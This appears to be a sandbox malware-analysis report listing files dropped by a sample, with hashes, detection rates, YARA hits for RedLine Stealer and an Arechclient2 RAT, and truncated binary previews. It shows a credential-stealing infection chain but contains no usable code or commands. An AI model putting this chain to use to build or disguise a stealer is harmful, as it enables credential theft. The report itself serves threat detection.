Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	608080
Entropy (8bit):	6.833616094889818
Encrypted:	false
SSDEEP:	12288:BlSyAom/gcRKMdRm4wFkRHuyG4RRGJVDjMk/x21R8gY/r:BKgcRKMdRm4wFkVVDGJVv//x21R8br
MD5:	C8FD9BE83BC728CC04BEFFAFC2907FE9
SHA1:	95AB9F701E0024CEDFBD312BCFE4E726744C4F2E
SHA-256:	BA06A6EE0B15F5BE5C4E67782EEC8B521E36C107A329093EC400FE0404EB196A
SHA-512:	FBB446F4A27EF510E616CAAD52945D6C9CC1FD063812C41947E579EC2B54DF57C6DC46237DED80FCA5847F38CBE1747A6C66A13E2C8C19C664A72BE35EB8B040
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!.........^......................................................j.....@A.........................`...W.....,.... ..................P/...0...A...S..............................h.......................Z.......................text...a........................... ..`.rdata..............................@..@.data...D...........................@....00cfg..............................@..@.tls................................@....rsrc........ ......................@..@.reloc...A...0...B..................@..B................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	450024
Entropy (8bit):	6.673992339875127
Encrypted:	false
SSDEEP:	12288:McPa9C9VbL+3Omy5CvyOvzeOKdqhUgiW6QR7t5s03Ooc8dHkC2esGAWf:McPa90Vbky5CvyUeOKn03Ooc8dHkC2eN
MD5:	5FF1FCA37C466D6723EC67BE93B51442
SHA1:	34CC4E158092083B13D67D6D2BC9E57B798A303B
SHA-256:	5136A49A682AC8D7F1CE71B211DE8688FCE42ED57210AF087A8E2DBC8A934062
SHA-512:	4802EF62630C521D83A1D333969593FB00C9B38F82B4D07F70FBD21F495FEA9B3F67676064573D2C71C42BC6F701992989742213501B16087BB6110E337C7546
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1C.._..._..._.)n...._......._...^."._..^..._..\..._..[..._..Z..._.._..._......_..]..._.Rich.._.........................PE..L.....0].........."!.....(..........`........@......................................,.....@A.........................g.......r...........................A.......=..`x..8............................w..@............p.......c..@....................text....&.......(.................. ..`.data...H)...@.......,..............@....idata.......p.......D..............@..@.didat..4............X..............@....rsrc................Z..............@..@.reloc...=.......>...^..............@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2046288
Entropy (8bit):	6.787733948558952
Encrypted:	false
SSDEEP:	49152:fECf12gikHlnKGxJRIB+y5nvxnaOSJ3HFNWYrVvE4CQsgzMmQfTU1NrWmy4KoAzh:J7Tf8J1Q+SS5/nr
MD5:	1CC453CDF74F31E4D913FF9C10ACDDE2
SHA1:	6E85EAE544D6E965F15FA5C39700FA7202F3AAFE
SHA-256:	AC5C92FE6C51CFA742E475215B83B3E11A4379820043263BF50D4068686C6FA5
SHA-512:	DD9FF4E06B00DC831439BAB11C10E9B2AE864EA6E780D3835EA7468818F35439F352EF137DA111EFCDF2BB6465F6CA486719451BF6CF32C6A4420A56B1D64571
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................`........................................p......l- ...@A.........................&..........@....P..x...............P/...`..\...................................................\|...\....&..@....................text............................... ..`.rdata..l...........................@..@.data...DR..........................@....00cfg.......@......................@..@.rsrc...x....P......................@..@.reloc..\....`......................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	257872
Entropy (8bit):	6.727482641240852
Encrypted:	false
SSDEEP:	6144:/yF/zX2zfRkU62THVh/T2AhZxv6A31obD6Hq/8jis+FvtVRpsAAs0o8OqTYz+xnU:/yRzX2zfRkX2T1h/SA5PF9m8jJqKYz+y
MD5:	4E52D739C324DB8225BD9AB2695F262F
SHA1:	71C3DA43DC5A0D2A1941E874A6D015A071783889
SHA-256:	74EBBAC956E519E16923ABDC5AB8912098A4F64E38DDCB2EAE23969F306AFE5A
SHA-512:	2D4168A69082A9192B9248F7331BD806C260478FF817567DF54F997D7C3C7D640776131355401E4BDB9744E246C36D658CB24B18DE67D8F23F10066E5FE445F6
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....4.c.........."!................P...............................................Sg....@A........................Dv..S....w..........................P/.......5..8q...............................................{...............................text...&........................... ..`.rdata.............................@..@.data................\|..............@....00cfg..............................@..@.rsrc...............................@..@.reloc...5.......6..................@..B........................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\tiktok[1].exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80880
Entropy (8bit):	6.920480786566406
Encrypted:	false
SSDEEP:	1536:lw2886xv555et/MCsjw0BuRK3jteo3ecbA2W86b+Ld:lw28V55At/zqw+Iq9ecbA2W8H
MD5:	A37EE36B536409056A86F50E67777DD7
SHA1:	1CAFA159292AA736FC595FC04E16325B27CD6750
SHA-256:	8934AAEB65B6E6D253DFE72DEA5D65856BD871E989D5D3A2A35EDFE867BB4825
SHA-512:	3A7C260646315CF8C01F44B2EC60974017496BD0D80DD055C7E43B707CADBA2D63AAB5E0EFD435670AA77886ED86368390D42C4017FC433C3C4B9D1C47D0F356
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......................08e...................................................u............Rich............PE..L...\|.0].........."!.........................................................0.......m....@A.............................................................A... ....... ..8............................ ..@............................................text............................... ..`.data...............................@....idata..............................@..@.rsrc...............................@..@.reloc....... ......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\63c3f20b

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.7412884482854505
Encrypted:	false
SSDEEP:	24576:SMf3uhVwEaaT4UB89Am9FnD7ET6cWFoMoA3cmCNFsgGHgbX/0WPmCP:SMf3us1aT4UyJnodWrC+cv0A
MD5:	DC143DA0C125E60EEC8B3696F31FAA4B
SHA1:	7A71B179E46FA4381B0D464F016D7A028785AF60
SHA-256:	70ABA449C8B8C13DFF6F6A46A2B87157DC41758CAD74C9177A13E9D58BC72280
SHA-512:	80CD70C09068ED5BC7D437686FDD0B4993FD164BE39679DB949FF19777AEEE05CC94398914A602E9C2E83F00E403C7B1934CE18765C677F3F81961E81692BB9B
Malicious:	false
Preview:	..i)..i)..i)..i)..i)/.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..h)..9yO.=h..$@h..Zd..u\..Md..uX..[..$Le.5yy..[j..uX..[...)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H. Gb..Hg..LN.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H.*[n..LB..]j..L..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i).. gO.;.W..Jy..Fm.GgN.5oy..L\|..B..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)}.G.%.Y.9.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)

C:\Users\user\AppData\Local\Temp\7364db56

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe
File Type:	data
Category:	dropped
Size (bytes):	1514213
Entropy (8bit):	7.7412865545287
Encrypted:	false
SSDEEP:	24576:bMf3uhVwEaaT4UB89Am9FnD7ET6cWFoMoA3cmCNFsgGHgbX/0WPmCP:bMf3us1aT4UyJnodWrC+cv0A
MD5:	C4B196F3EF34DF21365B856C70DCAEF3
SHA1:	7F18086BD79DAEEE5B160F6C54147A5BFECD5585
SHA-256:	DA81112ABC979E2E13B6674DB5B91829A210BA03B4D902C63E490A1F83417230
SHA-512:	029F97B8ED0FF97109EEAD25BE457DD52BA29B0F7264DF7B873B50AD598FFB8EB5E6CF9029E02DA3DE0E2793E88CA94B0A8E157DB4C9451261272C4791C042C1
Malicious:	false
Preview:	..i)..i)..i)..i)..i)/.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..h)..9yO.=h..$@h..Zd..u\..Md..uX..[..$Le.5yy..[j..uX..[...)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H. Gb..Hg..LN.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)H.*[n..LB..]j..L..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i).. gO.;.W..Jy..Fm.GgN.5oy..L\|..B..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)}.G.%.Y.9.i)..i)..i)..i)..i)..i)..i)..i)..i)..i)..i)

C:\Users\user\AppData\Local\Temp\IIDHJDGCGD.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.0.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	545792
Entropy (8bit):	6.384805269039956
Encrypted:	false
SSDEEP:	6144:yU3iKBTO7hQqRGoFyLmVmH6Q4vwRuGuoBhYkuFqeYAOfp+5ic6/:yU7UVGoFyLmVO6Q6wAGuoBh9Np+M/
MD5:	6C93FC68E2F01C20FB81AF24470B790C
SHA1:	D5927B38A32E30AFCF5A658612A8266476FC4AD8
SHA-256:	64A71B664D76641B35DAC312161CB356B3B3B5F0B45C9D88C8AFA547B4902580
SHA-512:	355E9677121EF17CF8C398F0C17399776D206C62014080A2C62682E1152EA0729DCC6E233358DCD6BAE009B07E3DB936D4B18EB37D6E7EBC2FE9CF8D827C4ADE
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 47%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......c...'i..'i..'i....[.7i....Y..i....X.8i...7..3i...7...i...7...i....9."i..'i..}i...7..%i...7U.&i..'i=.&i...7..&i..Rich'i..................PE..L....v)f..........................................@.......................................@.................................P...(.......@(................... ..l.......p........................... ...@............................................text...1........................... ..`.rdata..............................@..@.data...@ ..........................@....gfids..............................@..@.rsrc...@(.......*..................@..@.reloc..l.... ......................@..B........................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\agdgegmy

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Wed Apr 24 04:56:20 2024, mtime=Fri Apr 26 21:46:09 2024, atime=Wed Apr 24 04:56:20 2024, length=2469936, window=hide
Category:	dropped
Size (bytes):	1063
Entropy (8bit):	5.00046607198351
Encrypted:	false
SSDEEP:	24:85LmmCMq1NkRqgKIt5ra0yAQfrtN2LpOJoqyFm:8VXC1+RTVR0iYyF
MD5:	793902F76B6577E6B92B3ED74188BA5D
SHA1:	1E95DD45489FE3E4424E43829FFF1DA734CECF20
SHA-256:	3363E7411AE0C1AE6372694B7581143E0D7B2742DFCB8BC8B625708B6820C665
SHA-512:	D41AAB929CA822832A4228AF420ABE1B7C61DCEF6914123F5C5EAAE7547EF0438773F1912F0B71865C6570192798B988E3B463989F9C1FA9428822FD26CE2B45
Malicious:	false
Preview:	L..................F.... ....Z.!....^...+....Z.!....0.%.......................:..DG..Yr?.D..U..k0.&...&......vk.v.......}+...t:.+.......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.X.............................%..A.p.p.D.a.t.a...B.P.1......X....Local.<......CW.^.X......b.....................v...L.o.c.a.l.....N.1......X...Temp..:......CW.^.X.....l........................T.e.m.p.....T.1......X...u5c4.2..>......X..X.....D......................w..u.5.c.4...2.....V.2.0.%..X./ .run.exe.@......X./.X..............................r.u.n...e.x.e......._...............-.......^..............t.....C:\Users\user\AppData\Local\Temp\u5c4.2\run.exe......\.u.5.c.4...2.\.r.u.n...e.x.e.........\|....I.J.H..K..:...`.......X.......897506...........hT..CrF.f4... ..T..b...,.......hT..CrF.f4... ..T..b...,..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.2.........9.

C:\Users\user\AppData\Local\Temp\iolo\dm\ioloDMLog.txt

Download File

Process:	C:\Users\user\AppData\Local\Temp\u5c4.3.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4830
Entropy (8bit):	5.4741970837017515
Encrypted:	false
SSDEEP:	96:03uyqYKhM90DbfL76qAKPXPXPXPXPXPXPoPoPoPoPpPpPaPZYuPfkC:wmhM90DbfL76qAKPXPXPXPXPXPXPoPo6
MD5:	CF63A5E6671CBB2C46A67A2C03E32104
SHA1:	CF3686B018A4C316D7DCB34C3BD8A55F5FD8CFF9
SHA-256:	4FD8962006EDEF6E3C64391131DD6F256CB44C20BA79601B9080525C4020977A
SHA-512:	405158FB99F5D45B83471989CDBA47DB662753BE6DF54EA393137224EF237C6BE6D99D72945A4955EBB8D84910A5A5876235343FDACCB0CC80136B6F0854ACC4
Malicious:	false
Preview:	[04/27/24 00:46:12] Main : OS Version = osWin10...[04/27/24 00:46:12] CommandLineSwitchExists : Result of check = False. Param Value (if not exact match) = ...[04/27/24 00:46:13] Installer Target URL request = {"IPAddress":"192.168.2.4","Status":1,"Language":"en","OSMinorVersion":0,"OSMajorVersion":10,"ProductId":"5488CB36-BE62-4606-B07B-2EE938868BD1","Is64Bit":true,"ECommId":"11A12794-499E-4FA0-A281-A9A9AA8B2685"}...[04/27/24 00:46:17] Installer target url response = {"Url":"https://download.iolo.net/sm/24/11A12794-499E-4FA0-A281-A9A9AA8B2685/24.3.0.57/SystemMechanic.exe","ProductName":"System Mechanic Standard","Result":0,"ErrorMessage":null}...[04/27/24 00:46:17] DownloadAndLaunchInstaller : Creating BITS download handler...[04/27/24 00:46:17] !&TioloBITSHandler.InitCopyMgr : CreateCOMObject(CLSID_BackgroundCopyManager1_5)..[04/27/24 00:46:23] !&TioloBITSHandler.InitCopyMgr : Copy manager initialized = True...[04/27/24 00:46:23] DownloadAndLaunchInstaller : Target folder ="C:\User

C:\Users\user\AppData\Local\Temp\khjsru

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\khjsru, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\khjsru, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\khjsru, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\pasb

Download File

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	786944
Entropy (8bit):	6.809298494568767
Encrypted:	false
SSDEEP:	12288:wvsXZv8km0OHcbGbvzWHz0Hnquwxe+w0ssFWylkkoAbtEjrwfNqbYS2VbICKMIUO:jfPz0Hynw0ssFlSjT7L
MD5:	5AEBA331CE853D10C82B56ADC96C9E80
SHA1:	A208059F9591712ABF451114815B693AB14A5AB3
SHA-256:	EC51C3B08183CFE851DC93877A6F5B38CA8DD2E5D68E014A2B44C98078ED3434
SHA-512:	5DAACA835F0C9F5691D79CDDE45EF6887EACA6123F65994F8A90A42FF63B35DF6605F673E671004CC8F61B7EE0671ED9F25841A2D9EFEFF5EFC8DA8391CC6676
Malicious:	true
Yara Hits:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\pasb, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: C:\Users\user\AppData\Local\Temp\pasb, Author: Joe Security Rule: MALWARE_Win_Arechclient2, Description: Detects Arechclient2 RAT, Source: C:\Users\user\AppData\Local\Temp\pasb, Author: ditekSHen
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 65%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......]................................. ........@.. .......................`..............................................T...W.... .......................@....................................................... ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......L....>..........T...@............................................0............. ....X..%-.&sp...sq...}-..... ....Y.~-.....UY.).... .....7...%.....~,.....[Y.)....sr...~-.....TY.)....os.........%.~t.... ....X~t.... ....X~t.... ....X(.....%.~-.....SY.)......~-.....RY.)....~0...%-.&~/.........su...%.0...(...+}.....0........... ....X..{M.....0............(..... .p..Y. ...@\...\a..Z3.+.~t.... .M..X+2~...... ....^ ...l_.3.+. 4.rc H:;..+.~t.... ...X..#.......@. ..... ....\

C:\Users\user\AppData\Local\Temp\tmpE9B0.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\tmpFC21.tmp

Download File

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 11, database pages 7, cookie 0x3, schema 4, UTF-8, version-valid-for 11
Category:	modified
Size (bytes):	28672
Entropy (8bit):	2.5793180405395284
Encrypted:	false
SSDEEP:	96:/xealJiylsMjLslk5nYPphZEhcR2hO2mOeVgN8tmKqWkh3qzRk4PeOhZ3hcR1hOI:/xGZR8wbtxq5uWRHKloIN7YItnb6Ggz
MD5:	41EA9A4112F057AE6BA17E2838AEAC26
SHA1:	F2B389103BFD1A1A050C4857A995B09FEAFE8903
SHA-256:	CE84656EAEFC842355D668E7141F84383D3A0C819AE01B26A04F9021EF0AC9DB
SHA-512:	29E848AD16D458F81D8C4F4E288094B4CFC103AD99B4511ED1A4846542F9128736A87AAC5F4BFFBEFE7DF99A05EB230911EDCE99FEE3877DEC130C2781962103
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5c4.0.exe

Download File

Process:	C:\Users\user\Desktop\kO1P1YnLst.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	294912
Entropy (8bit):	6.780908421547604
Encrypted:	false
SSDEEP:	6144:72NSv3dOZV+M7pmrza4NRIGqSH38YQJGfXAK:72Iv3NupJ4NoYQAXAK
MD5:	15185ECF8919789DD51FB83FA01CB66B
SHA1:	EA1C88DA3852FC0F7EA43F6C93B17F5917D59062
SHA-256:	69A7FBEF7C1BEE81CB41AD268A2D71BE000360EE7263731D1BD9BF9C199ABA14
SHA-512:	3721941CA2143471DBAACE6015FCD918EA477E2431F06530976661D68501871152628A17B889F82CE06DF25385E2D81F239AE7D9BFCD64F6D9F3BF9A889644FF
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........Ku.[Ku.[Ku.[F'e[Uu.[F'Z[.u.[F'[[du.[B.)[Hu.[Ku.[;u.[.._[Ju.[F'a[Ju.[..d[Ju.[RichKu.[................PE..L......d.....................<.......@.......0....@..................................r..........................................(........i...................`..L....2..8...............................@............0...............................text............................... ..`.rdata...m...0...n..................@..@.data....M.......t..................@....rsrc....i.......j..................@..@.reloc..L....`.......j..............@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\u5c4.1.zip

Download File

Process:	C:\Users\user\Desktop\kO1P1YnLst.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	3884863
Entropy (8bit):	7.9982714074161665
Encrypted:	true
SSDEEP:	98304:7goFFJ7lj6j1elkeoTNxPxDZhAryYACWcTIxlN+ba:7guJ7wpfTDPxD0P2YG
MD5:	78D3CA6355C93C72B494BB6A498BF639
SHA1:	2FA4E5DF74BFE75C207C881A1B0D3BC1C62C8B0E
SHA-256:	A1DD547A63B256AA6A16871ED03F8B025226F7617E67B8817A08444DF077B001
SHA-512:	1B2DF7BEE2514AEE7EFD3579F5DD33C76B40606D07DBA69A34C45747662FAD61174DB4931BCA02B058830107959205E889FEE74F8CCC9F6E03F9FD111761F4EA
Malicious:	false
Preview:	PK.........?.X........I......bunch.dat\]...:.... "...T.......N<wf..X $;.e..)....\|u]+...UV.~.....f.Rje.......@.f.r..V....J-.#U.....=.T..E.5.Z..&..z...'.k..%..Je.....[5.....P..B...@........G..z[.-B1....Jz#....%.J...j...W........>62.jK(...........E.T.Q}.j._I..R.TEj.>..O..:J%o.......`.f+O...W>.....S.INC.m.6..\|wQ.xk.K.....o.D....:.n4....P>..M._\|...P.R@.gW...k..X...MbM.....H....... .....#o.CC.!...1!R.g....Qc "P....Q.3.H.B.F.\|...)...........@..W.6..Z..7.9.....d'`_.6.zr%a......7.,...l....h.v......P.O.f..!..Y..#..Y.7..g..v=..k....J...N#\.5.....]......<.VGU.~....,..X.o.k..#..?v..%.0.+...m.(m..ah.JG>.....m..V......kb...B.jX...V$p... ..?.<....^...%KA=0\.(......Q.l>.;x..#W.@@.tIU ...Q............./e.7Ew..}h..^N... ........+.........bRz.........2r.f..u'o..s.}1...j.{.'%.......?..Z..M.....9.\|P..W.o...c...3....H\.4..B......;14.65.Q3....24$...2(..9j......!.$..<<....P#b..Lj.D.vG.+.}.T..6tR..b."..o.f...h>.......Z..5.(....]........

C:\Users\user\AppData\Local\Temp\u5c4.2\UIxMarketPlugin.dll

Download File

Process:	C:\Users\user\Desktop\kO1P1YnLst.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1640960
Entropy (8bit):	6.484662993855079
Encrypted:	false
SSDEEP:	49152:/7Q2CH7FiYk7q8wOP2nyh9VgFdJYZL6MsQv4Pvg3KIA8wuSgKacXTT3Kos2lpm:sZH7FZk7LP2nyh9VgFdJYZL6NQgPVIAv
MD5:	D1BA9412E78BFC98074C5D724A1A87D6
SHA1:	0572F98D78FB0B366B5A086C2A74CC68B771D368
SHA-256:	CBCEA8F28D8916219D1E8B0A8CA2DB17E338EB812431BC4AD0CB36C06FD67F15
SHA-512:	8765DE36D3824B12C0A4478C31B985878D4811BD0E5B6FBA4EA07F8C76340BD66A2DA3490D4871B95D9A12F96EFC25507DFD87F431DE211664DBE9A9C914AF6F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 18%
Reputation:	unknown
